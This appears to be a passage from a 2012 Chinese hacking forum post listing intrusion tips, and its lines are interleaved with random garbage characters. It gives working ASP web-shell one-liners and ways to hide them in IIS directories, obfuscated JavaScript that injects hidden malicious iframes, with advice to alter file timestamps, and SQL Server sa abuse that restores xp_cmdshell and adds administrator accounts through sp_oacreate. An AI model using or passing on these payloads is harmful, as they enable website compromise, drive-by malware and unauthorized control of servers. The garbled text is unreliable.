1 f, q8 ^3 j6 H! W8 K! E用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。& `' J& S: t" p6 _
$ {$ [& ]' i; f. f; j6 o
53、隐藏ASP后门的两种方法
, l C; p; u. L6 X/ D& G/ D1、建立非标准目录:mkdir images..\3 B2 K" k& s7 m; x+ c4 ?
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
& x" S2 Q5 ^7 Z! }通过web访问ASP木马:http://ip/images../news.asp?action=login% j: h, {. p0 y2 ?! {( D) R. O7 Z
如何删除非标准目录:rmdir images..\ /s, B' H& E# |# b& ` J0 z; k5 d
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:) H9 O. y1 s2 E2 i( i- ?9 t. O
mkdir programme.asp" Y; Y3 B# s) [0 {5 ?0 U: K Q
新建1.txt文件内容:<!--#include file=”12.jpg”-->
2 ~: [4 _& u! M0 y$ T% F新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
! g$ V2 e' o+ x2 R rattrib +H +S programme.asp8 k' I5 Q/ G* Y7 q/ `
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
$ } E0 s6 d: [! m7 B6 k# H, B; o# J- S) P) o5 t
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。. [: x6 A$ Q7 ]) m- r! q
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。% [4 C4 Y" L+ u
+ w0 Y! g' P3 z! c( Y55、JS隐蔽挂马
7 G c" `$ s' o1.
! p/ g c4 E$ ^( bvar tr4c3="<iframe src=ht";7 J8 B$ I0 \$ Q" M# m- x
tr4c3 = tr4c3+"tp:/";3 L( t/ L2 X* M6 q
tr4c3 = tr4c3+"/ww";
" s8 }+ t# _, f4 D6 {tr4c3 = tr4c3+"w.tr4";
2 l% T2 t. b! v0 @/ Etr4c3 = tr4c3+"c3.com/inc/m";
, Z+ y% H B/ q0 y& ?, O/ Itr4c3 = tr4c3+"m.htm style="display:none"></i";+ e( z, h) l b7 z; _- W
tr4c3 =tr4c3+"frame>'";; G8 C+ `' }- t5 C
document.write(tr4c3);0 ~/ u# U3 Q4 X$ i& k
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
- `# t. f7 I! ]/ B$ F" M+ o; t2 @- n$ d. J# I/ L
2.
1 T+ {3 N2 G. I) @! s: `% K/ ?! x转换进制,然后用EVAL执行。如
: a- k; }4 u" q1 |( P. Beval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");8 u' f9 J4 f6 b, J! A6 ?; W
不过这个有点显眼。& L2 [9 s3 j5 \( j; D
3.; i3 ^" s ]+ M, z
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');3 r& j- v1 ?5 d4 f3 v+ a
最后一点,别忘了把文件的时间也修改下。
: g( F; t+ r, i' x0 x, T
6 s$ R' j% O0 S3 v& ]% W56.3389终端入侵常用DOS命令, }! y3 ]1 ]3 R4 w
taskkill taskkill /PID 1248 /t* r8 p A( \5 R4 Y! Q9 a
' B. @/ C; C, E$ |9 ptasklist 查进程
( @) H4 ~9 I$ C2 S4 N5 z' A+ J6 J, q# d6 \
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限8 Z7 O) R: o* l0 `0 R/ U% Z
iisreset /reboot
G6 z% N9 e8 Utsshutdn /reboot /delay:1 重起服务器 d* j; p* `6 l6 k F( x# W
; B* v% v' J2 m. i( s) Jlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,; Q* r. m3 j! b: D1 v$ M
$ ~# E* [/ S, b6 e) \8 x
query user 查看当前终端用户在线情况1 `( ]4 b' }4 \& A3 l) ~
- B' q$ h* A! F, C& b' ^6 v要显示有关所有会话使用的进程的信息,请键入:query process *2 O" @2 @7 |$ t$ t8 h: U7 y
9 T/ _( G8 \, R2 o Y+ N2 h
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:26 I! n9 [5 O+ T/ k& x4 U/ K$ U
3 h! Z8 [6 ]5 J2 g0 R! ^* @
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2; N9 j5 Q% v* Z3 h6 q3 L
+ y* r0 O! K% m+ o
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM025 C* _/ Q& t1 W+ h
# b0 b2 J: V! |' t+ B* [, P. J
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
- P0 i; ]7 M* j s/ J+ L! A, M& M3 I6 T6 H1 @# ^ Y# h: d
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
% c- E4 i V9 X. \& e) r
0 z# s8 P& d% x2 o e+ j命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。% E5 {/ L3 T; ^( w# K% T4 c' f
8 D. f+ V. E; Q命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
# U; Y- `7 w% P+ l: t% f3 t+ B4 @6 @9 t% m. o
56、在地址栏或按Ctrl+O,输入:
$ h$ F; t( W, K4 h0 Wjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;/ q1 |( c* C$ ?8 y
+ |1 B a: P' V* b3 j. i/ W
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。7 ?. ^. |2 i/ X g# r
. u" [7 C) v. W0 S
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
/ W N1 ?# J7 W) w" ?! ` I+ d用net localgroup administrators是可以看到管理组下,加了$的用户的。
% t9 p& h4 g) ` i1 |/ z k4 @9 @8 z: k3 z
58、 sa弱口令相关命令" ^9 r D+ j& B7 W+ g
* u: G6 L% c2 P一.更改sa口令方法: y. f$ V: J/ h2 \9 m) r
用sql综合利用工具连接后,执行命令:
. n% y3 k% E4 K% g, T4 ]$ F+ L) ~exec sp_password NULL,'20001001','sa'$ M6 W: a) e- u
(提示:慎用!)' g' L6 e# g( i$ {
# l, @" q# }+ i H4 @7 }
二.简单修补sa弱口令.
+ a' h- }$ U- q
7 {# d s7 d6 Y" X9 I2 `方法1:查询分离器连接后执行:
" H$ h( e. d' b" y7 k0 ]6 F2 dif exists (select * from
5 r8 E3 q Y$ M; M4 {' U. c& e: hdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and1 X- ` ]' r, `, G6 F% x3 A) x
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
/ z& s/ u& z7 h" u$ F4 L# B4 U- }9 ]' {0 k
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'2 Q1 ^3 A8 l* k+ M
f" g8 J2 T' d9 `% S
GO* p+ P O% S8 f o
' d8 w: `$ _5 C( ~然后按F5键命令执行完毕/ o" |, m) ?9 J' i6 z# o; J
- K% @5 v) Y: k" W5 j9 A( S方法2:查询分离器连接后
, u4 L( T8 W0 d' n7 e( C$ m第一步执行:use master) @ B c' G, y/ `2 a
第二步执行:sp_dropextendedproc 'xp_cmdshell'
5 Q4 u8 l3 J6 H( U. |然后按F5键命令执行完毕7 I& r$ _! g8 M: K: y$ ^8 K
+ u5 [% ~9 E, Z* q7 N
6 I0 j* h1 O4 K+ u! R三.常见情况恢复执行xp_cmdshell.
, C ~) p% d& ^. G7 a/ y
* a) y, W/ C+ g( \ Z5 |( i; p! r5 F" d( ~
1 未能找到存储过程'master..xpcmdshell'. d$ U3 G' O1 v% K. P# r
恢复方法:查询分离器连接后,1 ?! _2 Z( E; ^% P
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
8 v6 _* `2 |0 t: K" Z0 B. d第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'8 L5 B& v7 Z4 Z( W" I) s$ y' W
然后按F5键命令执行完毕& G4 V/ e6 ]" Y/ {0 C. W" a
& j. s: X! \3 b" b* D2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)! D2 r$ X3 z& U P
恢复方法:查询分离器连接后,
/ k+ O V( A- Q+ L第一步执行:sp_dropextendedproc "xp_cmdshell"
" S8 q) k O& ~5 }第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
: E7 ~- i" p) _8 h/ M然后按F5键命令执行完毕
) Q$ ]. O* c1 @8 H) h* _' ]: y7 d+ a! {
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)8 i2 p1 N- D8 T! Z% C; a
恢复方法:查询分离器连接后,
7 F+ d; u8 j' S+ G第一步执行:exec sp_dropextendedproc 'xp_cmdshell'# h: t& ?9 B B
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
+ a' _* p8 ~& T1 a% @然后按F5键命令执行完毕
0 P9 i0 {/ r& U2 x3 I
" P+ z7 }+ {, R( f" A4 M四.终极方法.
# }3 p' M) T* e* M' h9 m如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:2 q: ~8 T- [ K) H0 q7 Y% T
查询分离器连接后,
$ U9 w0 O5 `7 _: t2 i2000servser系统:
! ~5 ~2 n3 {2 g' {3 ~6 Tdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
- M% D* w$ ?/ k' a" [9 I( t4 A6 S; N+ {& m" n; ^" o
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'6 b0 G' g1 L1 j' O+ X
8 [. s! s0 ]/ k7 V: o! T
xp或2003server系统:
! {8 j* s0 ]- n# B" u! C8 x
* M$ T/ ~$ s X F6 O! H( l, ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
" c' O& I( _7 j7 w% z
I2 }! F7 p' G& Z7 Odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
9 i, g+ c0 f( e. [% F% p |
发表于 2012-9-15 14:13:15
收藏
支持
反对